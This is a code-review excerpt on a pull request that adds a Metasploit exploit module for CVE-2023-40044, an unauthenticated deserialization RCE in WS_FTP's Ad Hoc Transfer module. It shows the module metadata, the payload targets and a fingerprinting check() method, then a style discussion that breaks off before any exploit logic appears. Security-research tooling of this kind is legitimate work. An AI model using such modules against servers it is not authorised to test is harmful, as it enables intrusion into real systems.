modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code
+          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server
+          prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-40044'],
+          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],
+          ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023']
+        ],
+        'DisclosureDate' => '2023-09-27',
+        'Platform' => %w[win],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'Space' => 1024 },
+        'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`.
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command
+            }
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_powershell
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Msf::OptString.new('TARGET_URI', [ false, 'Target URI. Must begin with /AHT/', '/AHT/']),
+      ]
+    )
+  end
+
+  def check
+    # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/AHT/AHT_UI/public/index.html'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    title = Nokogiri::HTML(res.body).xpath('//head/title')&.text
+
+    # We verify the target is running the AHT module, by inspecting the HTML heads title.
+    if title == 'Ad Hoc Transfer'
```

Comment:
```suggestion
    if title != 'Ad Hoc Transfer'
      CheckCode::Unknown
    endif
```

Inverting the condition will reduce the nested indentation level :)

Reply:
I liked how the fall through for the `check` method ends with `CheckCode::Unknown` and there is no other path to return `CheckCode::Unknown`. 3 levels of indentation seems acceptable to me. Happy to do it differently if there is a preferred convention on this.